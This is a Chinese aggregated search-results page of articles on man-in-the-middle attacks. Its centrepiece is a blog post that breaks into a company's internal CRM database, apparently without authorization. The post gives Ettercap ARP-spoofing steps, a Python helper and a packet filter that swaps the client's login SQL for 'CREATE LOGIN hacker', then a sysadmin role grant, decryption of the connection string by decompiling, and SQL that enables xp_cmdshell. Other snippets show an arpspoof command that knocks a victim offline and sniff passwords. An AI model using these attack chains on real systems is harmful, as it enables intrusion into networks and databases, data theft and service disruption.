精华内容
下载资源
问答
  • 一个在公司内部使用的系统,为什么要挂到外网上,让任何都可以下载?数据库权限控制,不同的系统划分不同的账号这是基本常识(我也经常不划分,就是为了偷懒),不同的账号控制不同的权限,甚至账号可以细化到读/...


    今天这篇文章不准备讲太多理论,讲我最近遇到的一个案例。从技术上讲,这个例子没什么高深的,还有一点狗屎运的成分,但是它又足够典型,典型到我可以讲出很多大道理用来装逼。So,我们开始吧。

     

    1.1 一个公司内部专用的CRM系统

    CRM系统是什么,如果你不知道的话,请自行Google。从数据的角度讲,它包含了一个公司所有往来客户的机密资料,如果泄露的话,后果很严重。下面是我无意中发现的一个网站,挂着一个CRM软件的下载链接。开始的时候我以为这个是一家卖CRM的公司,但是看着又不太像。

    从网站的其他信息看,这仿佛是一个公司内部的CRM系统,于是我下载下来。

    直接是一个登录界面,我先随便输入了一个用户名,没有输入密码。

    然后我又输入了一个“admin”.

    通过简单的尝试,我们可以确定这不是通用的CRM系统,是定制的,而且可以在外网使用,是否有绑定计算机不得而知,外网服务器IP不知道,是否直接连接外网的数据库服务器不知道。下面我们通过抓包来确认一下。

    1.2  抓包分析

     

    启动Wireshark,然后点击登录按钮,立即停止抓包,我发现了一连串的TDS包。

    下面的信息确认这个软件是直接连接的数据库服务器,并没有通过后端的服务接口来返回数据。

    查询语句很明显,但是也很奇怪,开发者在用用户名查询密码,然后要做的应该是用返回的密码和用户输入的密码进行比对。不过还好,它返回的密码是加密过的。

    根据对sqlserver 的了解,在登录认证阶段,默认是加密传输的,并不会暴露用户名和密码,但是我们可以通过从数据包中分析出数据库的版本和服务器的基本信息。

    访问的数据库名:

    服务器名称:

    当然从名字上看应该是win7系统,win7做服务器也比较奇葩。

    数据版本:

    SqlServer 10.0,应该是2008版本。

    ok,现在简单总结下。通过抓包分析,我们得到了目标服务器的IP,打开的端口至少有80和1433,操作系统是win7,数据库为SQLServer2008,连接的目标数据库名称。下面我们有三个方向可以去努力,一个是找服务器和web应用的漏洞去渗透,第二个是继续挖掘软件本身的漏洞,第三个是攻击数据库。我们不知道当前应用登录数据库所使用的账号的权限是怎么样的,但是已经能够大致判断软件编写者的编程水平了,从编程水平去推断90%的可能性是sa用户或者sa权限。下面邪恶的想法来了,拦截并修改查询语句,新建一个数据库管理账号,然后使用工具直接连接上去,那么不就控制了数据库了吗,控制数据库后是不是还有机会控制服务器呢?试试便知。

    1.3  测试中间人攻击

    在本机就没必要中间人攻击了吧?不过我还是非常想利用Ettercap的Filter和replace功能,可以省掉很多麻烦。

    首先在虚拟机里启动我的Kali Linux,然后在Kali里面启动Ettercap进行Arp欺骗测试(Ettercap的详细使用请google,这里简单说明)。

    第一步,开启路由转发功能。

    # 启用IP路由转发功能

    echo 1 > /proc/sys/net/ipv4/ip_forward

    第二步,在”/etc/ettercap/etter.conf”中配置转发。

    第三步,arp欺骗。

    第四步,测试。

    使用driftnet 测试,是否能拦截主机的图片请求,如果能,证明arp欺骗成功。

    1.4  FILTER和REPLACE数据构造

    上面的测试证明了中间人攻击可行,那么下面我们开始构造Filter脚本。先创建一个1433.filter文件,输入如下内容:

    search和replace的内容是需要我们按需构造的。search的内容我们可以在刚才的抓包工具中获取到,就是从数据库中查询密码的sql语句,replace的内容我这里想要它执行这样的语句:

    CREATE LOGIN hacker WITH PASSWORD=’YouGotHacked1#’;

    下面我们再回头看看要搜索的元素请求数据。

    select Employee_UserName,Employee_PassWord from E_Employee where Employee_State= 217 and Employee_UserName='admin'

    这份数据每个字符后面都填充了\x00的null byte,这是不可打印的,这意味着我们需要将内容全部转为16进制,然后填充\x00。

    还有另一个问题要注意,替换的数据必须与原数据长度相同,否则会引起TCP数据传输中断。手工去做这件事略微有点麻烦,我还是写段小程序来搞定吧。

    def stringToHex(string,padLength=0):

         s1=[hex(ord(s)).replace("0x",'\\x') for s in string];

         result='';

         for s in s1:

              result=result+s+'\\x00'

         for num in range(padLength):

              result=result+'\\x20\\x00'

         return result;

     

    def getHex(sourceSql,targetSql):

         if len(sourceSql) <len(targetSql):

              print('erro');

         else:

              padLength=len(sourceSql)-len(targetSql);

              print(stringToHex(sourceSql));

              print(stringToHex(targetSql,padLength));

             

    def main():

         source="select Employee_UserName,Employee_PassWord from E_Employee where Employee_State= 217 and Employee_UserName='admin'";

         target="CREATE LOGIN hacker WITH PASSWORD='YouGotHacked1#'";

         getHex(source,target);

    if __name__=='__main__':

         main();

    一小段python,不是什么高明的代码就不解释了,最终filter脚本的样子:

    下面我们将1433.filter文件生成为Ettercap能够使用的ef文件。

    再次运行 Ettercap:

    此时点击软件的登录按钮。

    我们看到filter脚本打印出来的“success replace”,是不是真的成功了呢?

    我使用vs2015的数据库连接工具,进行连接,奇迹就这么出现了:

    连接成功。不过权限有点问题,我们可以再次修改Sql语句,提升它的权限,比如下面这句话:

    ALTER SERVER ROLE sysadmin ADD MEMBER hacker;

    这一步就不详细演示了,流程和上面一样。下面我们再回到另一个分支上,来找找软件本身的弱点。

    1.5 反编译和解密

    看了下面的内容,你一定会觉得我上面的操作都是瞎费劲,几分钟就解决问题了。这个例子确实是这样,不过上面的方法更通用一些,而且难度不高,是需要优先掌握的。

    在软件的安装目录中,我首先看到了这样几个dll文件:

    作为一名资深的.NET程序员,看到名字我就知道这是.NET写的程序了。于是先找到config文件,看看程序员是不是把数据库连接串写到这里了。

    连接串确实在这里了,不过加密了。

    但是到这里,我对这个程序已经没什么欲望了,即使它防护做的再好,那也是个.NET程序,是.NET程序,我就能攻破它(专业破解.NET,从未失败过)。不过令人失望的是,这个程序连基本代码混淆都没做,当然更没有壳,也没有代码加密。使用反编译工具随便点了点,然后拷贝了几段代码:

    还是要忍不住吐槽这代码写的太渣了,不过成功的解密了连接串,成功登录了数据库,不是SA用户,但是却有sa权限,试了下xp_cmdshell,默认被数据库禁用了。执行下面的sql语句解封,

    sp_configure 'show advanced options',1

    reconfigure

    go

    sp_configure 'xp_cmdshell',1

    reconfigure

    go

    1.6 小结—架构、权限管理、加密/解密、源码保护

    好了,又到了装逼的环节了。这段总结是说给像我这样平时大道理一堆堆,写代码的时候一坨坨的程序员的。

    首先,权限管理必须要严格控制。一个在公司内部使用的系统,为什么要挂到外网上,让任何人都可以下载?数据库权限控制,不同的系统划分不同的账号这是基本常识(我也经常不划分,就是为了偷懒),不同的账号控制不同的权限,甚至账号可以细化到读/写,表,存储过程级别。既然用户有角色划分,那么我们的代码必须也要有访问权限划分。不是在代码内部要访问数据的时候加个if-else,应该在调用还没开始就挡在外面。

    第二,一个必须联网才能使用的程序,为什么不把数据访问,核心业务逻辑都放在远端的服务器上,公开接口给客户端调用呢?只有一个原因,程序员太懒。我就是搞winform的,你要老子搞什么服务端,不会!连基本的分层和服务划分都不注意,在基础架构这就留下了安全隐患,同时客户端的安全漏洞直接导致服务器被攻陷。

    第三,.NET/Java 这类应用没有办法绝对防止反编译,只是时间问题。但是这不代表我们就不应该做程序保护,加壳,源码混淆,程序集加密,结合服务端获取进行rsa加密解密的动态程序集构建技术,是可以把90%的初级用户挡在门外的。城门大开就不对了。

    这些话题就不展开了,网上一搜一大堆。

    好吧,没什么值得继续的了,到此结束吧。

     

    下面是广告时间:

    关注微信订阅号,持续推送优秀安全类文章。

    欢迎加入网络安全群:147098303。

    最新网络公开课预告

    时间:5月24日

    内容:python黑客编程之局域网嗅探和敏感信息探测

    报名地址:http://edu.csdn.net/huiyiCourse/detail/126

    展开全文
  • ARP中间人攻击

    千次阅读 2019-06-05 17:37:56
    断网攻击: 攻击发起端:同网段kali Linux 攻击目标:同网段Windows7 已知攻击目标ipv4地址为192.168.1.224 在攻击发起端执行: ...软件:ettercap 步骤: 然后静静等待,仔细观察下方是否有可疑数据。

    断网攻击:

    攻击发起端:同网段kali Linux
    攻击目标:同网段Windows7
    已知攻击目标ipv4地址为192.168.1.224
    在攻击发起端执行:

    arpspoof -i eth0 -t 192.168.1.224 127.0.0.1
    

    再查看攻击目标,已经无法连接网络。

    捕获密码攻击:

    攻击发起端:同网段kali Linux
    软件:ettercap
    步骤:
    在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述然后静静等待,仔细观察下方是否有可疑数据。
    在这里插入图片描述

    展开全文
  • 中间人攻击

    千次阅读 2013-03-05 15:43:58
    ...中间人攻击 维基百科,自由的百科全书 跳转至: 导航、 搜索 在密码学和计算机安全领域中,中间人攻击 ( Man-in-the-middle attack,通常缩写为MITM )是指攻击者与通讯的两端

    原文地址:https://zh.wikipedia.org/wiki/%E4%B8%AD%E9%97%B4%E4%BA%BA%E6%94%BB%E5%87%BB

     

    中间人攻击

    维基百科,自由的百科全书
    跳转至: 导航 搜索

    密码学计算机安全领域中,中间人攻击Man-in-the-middle attack,通常缩写为MITM )是指攻击者与通讯的两端分别建立独立的联系,并交换其所收到的数据,使通讯的两端认为他们正在通过一个私密的连接与对方直接对话,但事实上整个会话都被攻击者完全控制。在中间人攻击中,攻击者可以拦截通讯双方的通话并插入新的内容。在许多情况下这是很简单的(例如,在一个未加密的Wi-Fi 无线接入点的接受范围内的中间人攻击者,可以将自己作为一个中间人插入这个网络)。

    一个中间人攻击能成功的前提条件是攻击者能将自己伪装成每一个参与会话的终端,并且不被其他终端识破。中间人攻击是一个(缺乏) 相互认证的攻击。大多数的加密协议都专门加入了一些特殊的认证方法以阻止中间人攻击。例如,SSL协议可以验证参与通讯的一方或双方使用的证书是否是由权威的受信任的数字证书认证机构颁发,并且能执行双向身份认证。

    目录

    需要通过一个安全的通道做额外的传输

    Interlock Protocol(连锁协议)不同,所有能抵御中间人攻击的加密系统都需要通过一个安全通道来传输或交换一些额外的信息。为了满足不同安全通道的不同安全需求,许多密钥交换协议已经被研究了出来。

    攻击示例

    中间人攻击示意图

    假设爱丽丝(Alice)希望与鲍伯(Bob)通信。同时, 马洛里(Mallory)希望拦截窃会话以进行窃听并可能在某些时候传送给鲍伯一个虚假的消息。

    首先,爱丽丝会向鲍勃索取他的公钥。如果Bob将他的公钥发送给Alice,并且此时马洛里能够拦截到这个公钥,一个中间人攻击就可以开展。马洛里发送给爱丽丝一个伪造的消息,声称自己是鲍伯,并且附上了马洛里自己的公钥(而不是鲍伯的)。

    爱丽丝收到公钥后相信这个公钥是鲍伯的,于是爱丽丝将她的消息用马洛里的公钥(爱丽丝以为是鲍伯的)加密,并将加密后的消息回给鲍伯。马洛里再次截获爱丽丝回给鲍伯的消息,并使用马洛里自己的私钥对消息进行解密,如果马洛里愿意,她也可以对消息进行修改,然后马洛里使用鲍伯原先发给爱丽丝的公钥对消息再次加密。当鲍伯收到新加密后的消息时,他会相信这是从爱丽丝那里发来的消息。

    1. 爱丽丝发送给鲍伯一条消息,被马洛里截获:

    爱丽丝 “嗨,鲍勃,我是爱丽丝。给我你的公钥“ --> 马洛里           鲍勃
    

    2. 马洛里将这条截获的消息转送给鲍伯;此时鲍伯不能分辨这条消息是否真的是从爱丽丝那里发来的:

    爱丽丝          马洛里 “嗨,鲍勃,我是爱丽丝。给我你的公钥“ --> 鲍伯
    

    3. 鲍伯回应爱丽丝的消息,并附上了他的公钥:

    爱丽丝          马洛里 <-- [鲍伯的公钥]-- 鲍伯
    

    4. 马洛里用自己的密钥替换了消息中鲍伯的密钥,并将消息转发给爱丽丝,声称这是鲍伯的公钥:

    爱丽丝 <-- [马洛里的公钥]-- 马洛里          鲍勃
    

    5. 爱丽丝用她以为是鲍伯的公钥加密了她的消息,以为只有鲍伯才能读到它:

    爱丽丝 “我们在公共汽车站见面!”--[使用马洛里的公钥加密] --> 马洛里          鲍勃
    

    6. 然而,由于这个消息实际上是用马洛里的密钥加密的,所以马洛里可以解密它,阅读它,并在愿意的时候修改它,然后使用鲍伯的密钥重新加密,并将重新加密后的消息转发给鲍伯:

    爱丽丝          马洛里 “在家等我!”--[使用鲍伯的公钥加密] --> 鲍伯
    

    7. 鲍勃认为,这条消息是经由安全的传输通道从爱丽丝那里传来的。

    这个例子显示了爱丽丝和鲍伯需要某种方法来确定他们是真正拿到了属于对方的公钥,而不是拿到来自攻击者的公钥。否则,这类攻击一般都是可行的,在原理上,可以针对任何使用公钥——密钥技术的通讯消息发起攻击。幸运的是,有各种不同的技术可以帮助抵御MITM攻击。

    防御攻击

    许多抵御中间人攻击的技术基于以下认证技术:

    • 公钥基础建设
      • PKI方案中,主要防御中间人攻击的方案就是PKI的相互认证的机制。使用这样的机制并由应用程序验证用户(在某些流氓应用的情况下这,这不是很有用)-- 用户设备验证应用程序。注意此处流氓软件应与正规软件进行区分。
    • 更强壮的相互认证 ,例如:
      • 密钥(通常是高信息熵的密钥,从而更安全),或
      • 密码(通常是低的信息熵的密钥,从而降低安全性)
    • 延迟测试,例如使用复杂加密哈希函数进行计算以造成数十秒的延迟;如果双方通常情况下都要花费20秒来计算,并且整个通讯花费了60秒计算才到达对方,这就能表明存在第三方中间人。
    • 第二(安全的)通道的校验
    • 一次性密码本可以对中间人攻击免疫,这是在对一次密码本的安全性和信任上建立的。

    公钥体系的完整性通常必须以某种方式得到保障,但不需要进行保密。密码和共享密钥有额外的保密需求。 公钥可以由证书颁发机构验证,这些公钥通过安全的渠道(例如,随Web浏览器操作系统安装)分发。 公共密钥也可以经由Web在线信任进行在线验证 ,可以通过安全的途径分发公钥(例如,通过面对面的途径分发公钥)。

    查看密钥交换协议以了解不同类别的使用不同密钥形式或密码以抵御中间人攻击的协议。

    中间人攻击的取证分析

    从被怀疑是中间人攻击的链接中捕捉网络数据包并进行分析可以确定是否存在中间人攻击。 在进行网络分析并对可疑的SSL中间人攻击进行取证时,重要的分析证据包括:

    • 远程服务器的IP地址
    • DNS域名解析服务器
    • X.509证书服务器
      • 证书是自签名证书吗?
      • 证书是由信任的颁发机构颁发的吗?
      • 证书是否已被吊销?
      • 证书最近被更改过吗?
      • 在互联网上的其他的客户端是否也得到了相同的证书?

    其他的非加密的中间人攻击

    一个著名的非加密中间人攻击的例子是贝尔金无线路由器2003年的某一个版本所造成的。它会周期性的接管通过它的HTTP连接,阻止数据包到达目的地。并将它自己对请求的回应作为应答返回。而它发送的回应,则是在用户原本应该显示网页的地方,显示一个关于其他贝尔金产品的广告。在遭到了解技术详情的用户的强烈抗议后,这个功能被贝尔金从路由器后续版本的固件中删除。[1]

    另一个典型的非加密中间人攻击的例子是“ 图灵色情农场”。布赖恩·华纳说,这是垃圾邮件发送者用来绕过验证码的“可以想象的攻击”。垃圾邮件发送者设置了一个色情网站,而访问这个色情网站需要用户解决一些验证问题。这些验证问题实际上是其他网站的验证问题。这样就可以达到绕开网站验证发送垃圾邮件的目的。[2] 然而, Jeff Atwood指出,这次袭击仅仅是理论上的——没有任何证据指出垃圾邮件发送者曾经在2006年建立了图灵色情农场。[3] 然而,2007年10月有新闻报道称,垃圾邮件发送者确实建立了一个Windows游戏,当用户键入从雅虎收到的注册邮箱验证码后,程序将奖励用户色情图片。[4] 这将允许垃圾邮件发送者创建临时的免费电子邮件帐户以发送垃圾邮件

    实现

    • dsniff - 一个实现SSHSSL中间人攻击的工具
    • Cain and Abel - Windows图形界面的工具,它可以执行中间人攻击,嗅探和ARP投毒
    • Ettercap - 一个基于局域网的中间人攻击工具
    • Karma - 一个使用802.11 Evil Twin以执行MITM攻击的工具
    • AirJack -一个演示802.11 MITM攻击的工具
    • SSLStrip一个基于SSL的MITM攻击的工具。
    • SSLSniff一个基于SSL的MITM攻击的工具。原本是利用一个在Internet Explorer上缺陷实现的。
    • Intercepter-NG -- 一个有ARP投毒攻击能力的Windows网络密码嗅探器。可以进行包括SSLStrip在内的基于SSL的MITM攻击。
    • Mallory - 一个透明的TCP和UDP MiTMing代理。扩展到MITM SSL,SSH和许多其他协议。
    • wsniff - 一个802.11HTTP / HTTPS的基于 MITM攻击的工具
    • 安装在自动取款机银行卡插槽上的附加读卡器和安装在键盘上的附加密码记录器。

    参见

    • 浏览器中间人攻击 -一种网页浏览器中间人攻击
    • Boy-in-the-browser - 一个简单的Web浏览器中间人攻击
    • Aspidistra transmitter -英国二战 “入侵”行动中使用的无线电发射器,早期的中间人攻击。
    • 计算机安全 - 安全的计算机系统的设计。
    • 安全性分析 - 在不完全知道加密方法的情况下破解加密后的信息。
    • 数字签名 -一个加密文字的真实性担保,通常是一个只有笔者预计将能够执行计算的结果。
    • 联锁协议 -一个特定的协议,在密钥可能已经失密的情况下,规避可能发生的中间人攻击。
    • 密钥管理 - 如何管理密钥,包括生成,交换和存储密钥。
    • 密钥协商协议 - 又称密钥交换协议,一个协商如何创建适合双方通信的密钥的协议。
    • 相互认证 -如何沟通各方的信心建立在彼此的身份。
    • 密码认证密钥协议 -建立使用密码钥匙的协议。
    • 量子密码 - 量子力学的使用提供安全加密(老方法,而依靠单向函数 )。
    • 安全通道 - 一种在通信中防截获和防篡改的方式。
    • 欺骗攻击

    参考资料

    1. ^ Leyden, John. Help! my Belkin router is spamming me
       
      . The Register. 2003-11-07.
    2. ^ Petmail Documentation: Steal People's Time To Solve CAPTCHA Challenges
       
      [2008-05-19].
    3. ^ CAPTCHA Effectiveness
       
      . 2006-10-25.
    4. ^ PC stripper helps spam to spread
       
      . BBC News. 2007-10-30.

     

    展开全文
  • Ettercap最初设计为交换网上的sniffer,但是随着...让你发送从网络适配 器到应用软件各种级别的包.绑定监听数据到一个本地端口:从一个客户端连接到这个端口并且能够为不知道的协议解码或者把数据插进去(只有在arp为基础

    Ettercap最初设计为交换网上的sniffer,但是随着发展,它获得了越来越多的功能,成为一款有效的、灵活的中介攻击工具。它支持主动及被动的协议解析并包含了许多网络和主机特性(如OS指纹等)分析。你能够用飞一般的速度创建和发送伪造的包.让你发送从网络适配 器到应用软件各种级别的包.绑定监听数据到一个本地端口:从一个客户端连接到这个端口并且能够为不知道的协议解码或者把数据插进去(只有在arp为基础模 式里才能用)
    这里写图片描述
    这里写图片描述

    展开全文
  • 重放攻击和中间人攻击

    千次阅读 2019-07-14 16:03:20
    重放攻击 即假设A向B认证自己,B要求A提供账户和密码作为身份信息。... ...中间人攻击(Man-in-the-middle 缩写:MITM) ...中间人攻击是攻击者把自己当作客户端与服务器端的中间人,客户端发送的信息...
  • 最好用的中间人攻击工具mitmproxy

    千次阅读 2018-11-07 21:11:33
    mitmproxy 是 man-in-the-middle attack proxy 的简称,译为中间人攻击工具,可以用来拦截、修改、保存 HTTP/HTTPS 请求。做爬虫离不开这些工具,特别是基于APP的爬虫。mitmproxy 以命令行终端形式呈现,操作上类似...
  • 破解wifi并实施中间人攻击

    千次阅读 2018-05-13 23:23:32
    破解密码到此结束,我们开始嗅探抓包实施中间人攻击的内容: 首先说一下,利用各种工具我们能在内网中干什么 1.arp断网攻击,让受害者无法上网【arpspoof】 2.arp欺骗,嗅探抓包,查看http请求,从而获得cookie等...
  • 什么是中间人攻击?如何避免?

    万次阅读 2019-05-10 10:39:06
    不要让中间人愚弄了你 你可能听说过“中间人攻击(MiTM)”这个词,你可能甚至对它有一个模糊的概念。但是,你仍旧会想“到底什么才是中间人攻击”,对吗?让我们来向你解释一下。正如它的名字本身所暗示的,当未...
  • 清晰图解https如何防范中间人攻击

    千次阅读 2020-06-09 21:37:37
    ... 第一阶段 认证站点 ...客户端通过数字证书验证所访问的站点是真实的目标站点。 第二阶段 协商密钥 ...客户端与站点服务器协商此次...中间人攻击的几种形式 直接抓取报文获得明文信息 非法中间加密代理,窃取明文信息
  • SSH V2的中间人攻击

    千次阅读 2013-08-30 18:24:27
    中间人攻击(Man-in-the-MiddleAttack,简称“MITM攻击”)中间人攻击很早就成为了黑客常用的一种古老的攻击手段,并且一直到今天还具有极大的扩展空间。 在网络安全方面,MITM攻击的使用是很广泛的,曾经猖獗一时...
  • 强大的中间人攻击工具(Bettercap)

    千次阅读 2020-02-26 17:17:01
    提到中间人攻击,最知名的莫过于ettercap,这是kali下一款优秀的ARP欺骗工具,但是它自从2015年开始就没有更新了,同时在大型网络环境中ettercap的主机发现以及欺骗功能效果较差,于是就诞生了bettercap。...
  • 中间人攻击&防御方式全解

    千次阅读 2017-09-04 14:40:00
    正如中间人攻击(MiTM)。这种攻击的目的很简单,就是在有线或者无线连接的中间放置一个攻击者。但是,随着云计算、物联网(IoT)、BYOT等网络技术的发展,攻击者也开始寻找新的方式以使那些古老的攻击方式可以重新...
  • 五种工具理解SSL/TLS中间人攻击

    千次阅读 2020-04-06 17:52:59
    本文先使用ettercap实现了普通的中间人攻击,然后根据burpsuite抓取https流量的原理,解析了sslsplit解密ssl流量的过程,同时演示了mitmproxy的劫持方式,最后简单说明了sslstrip的工作原理,通过多种实验的方式更好...
  • ARP中间人攻击详细过程及原理

    千次阅读 2020-07-19 23:58:30
    ARP中间人攻击详细过程及原理 一.实验详细过程 实验工具: Kali,ENSP,Wireshark 实验环境: Kali:IP: 192.168.135.1 Server:192.168.135.22 Client:IP:192.168.135.11 网关:192.168.135.22 1.在ENSP上搭建...
  • 相关的接口已经通过抓包软件fiddler定位到了,但是这两个接口需要传递一个key值才能获取到响应的数据,而这个key的参数不仅动态变化,而且还是通过微信的自定义的协议进行传递通信,所以按照一般的手段,很难获取到...
  • WiFi中间人钓鱼攻击工具:Wifiphisher

    千次阅读 2015-07-29 14:09:56
    由于利用了社工原理实施中间人攻击,Wifiphisher在实施攻击时无需进行暴力破解。 WiFiphiser是基于MIT许可模式的开源软件,运行于Kali Linux之上。 Wifiphiser实施攻击的步骤有三: 1. 首先解除攻击者与AP...
  • 如何避免“中间人”攻击

    千次阅读 2013-08-27 22:38:21
    所谓“中间人”工具,就是假冒服务器,接收客户端请求,并且和服务器通讯   那么怎么解决这种不安全因数呢,第一种方式就是对数据进行加密:   采用基于密匙的安全验证   需要依靠密匙,也就是你必须为自己...
  • 不容忽视的Wi-Fi中间人攻击

    千次阅读 2015-10-12 11:17:19
    中间人攻击的概念  中间人攻击的概念最早应该是在密码学中定义的,所以它并不是什么新鲜的东西,中间人攻击的原理可以用下图来表示:  密码学中举例通常就用Alice、Bob和Eve来说,我们也遵照这一习惯。...
  • 这是作者的网络安全自学教程系列,...本文将详细讲解中间人攻击或ARP欺骗攻击,从ARP原理到局域网配置进行描述,重点是让您对ARP欺骗和网络投毒攻击有一定认识。真心希望这篇基础文章对您有所帮助,也欢迎大家讨论。
  • 本文参考: ...声明:本文仅建议在实验环境下使用,读者在其它环境参考本文使用产生的问题由读者承担! 注意:本文的命令如果提示权限问题,请在命令前加sudo ...本文用到软件和硬件条件: Ubuntu15.04(自带Op
  • 文章目录介绍浏览器查看公钥证书OpensslSSLScanNmapQUALYS SSL LABS网站SSL/TLS中间人攻击原理SSLsplitopenssl生成证书私钥,再生成私钥签名证书。步骤让中间人实现路由功能ARP欺骗启动SSLSplit侦听端口攻击成功后...
  • Lanmitm — Android中间人攻击测试工具

    千次阅读 2015-06-12 13:39:45
    Lanmitm — Android中间人攻击测试工具 功能概述 数据嗅探,可抓去局域网内部主机与外界通信数据 会话劫持,对局域网中的主机通过实施ARP欺骗,进行cookie欺骗,从而达到劫持会话的效果 简单web...
  • 前言: 目录前言:实验环境攻击原理攻击过程...常见的中间人攻击手段:arp欺骗,局域网内的一台主机和网关进行ARP欺骗,更改这台主机和网关的ARP缓存表,截获信息。 模拟一:图客户端访问服务器,输入登陆账户和密
  • 解析中间人攻击--DNS欺骗

    千次阅读 2012-04-24 20:32:01
     DNS欺骗是这样一种中间人攻击形式,它是攻击者冒充域名服务器的一种欺骗行为,它主要用于向主机提供错误DNS信息,当用户尝试浏览网页,例如IP地址为XXX.XX.XX.XX ,网址为www.bankofamerica.com,而实际上登录的...
  • 在同一局域网,主机A和B通过网关G相互通信,就好比A和B两个写信,由邮递员G送信,C永远都不会知道A和B之间说了些什么话。但是并不是想象中的那么安全,在ARP缓存表机制存在一个缺陷,就是当请求主机收到ARP应答包...
  • dns服务器 、dns中间人篡改服务器

    千次阅读 2015-01-30 22:31:50
    软件介绍:  本身为独立执行程序,跨平台,可以充当正常dns服务器。默认情况下,本程序只篡改MX(邮件交换记录)为特定主机。 作用: 本软件 与 本博客前文中的 smtp 中继监控服务器程序 结合来实施攻击,特别在内...
  • 其实以前也听说过中间人攻击,也玩过ettercap,MITMf,metasploit等,但是一直没想过在Android上面实现这些功能,于是乎下载dsploit源码玩了几天。 刚好自己也是做Android相关工作的,所以有了自己写一个的想法,依...
  • Apache源码改造之SSL中间人攻击

    千次阅读 2011-06-14 16:19:00
    Apache是世界排名第一的WEB服务器,它的高效、灵活、程序结构的高度模块化在我的博客中已经讲了很多,这篇文章主要来讲讲通过对Apache源码的小小改动来实现SSL中间人攻击并给出防范策略。 首先先来看看什么是SSL。...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 243,260
精华内容 97,304
关键字:

中间人软件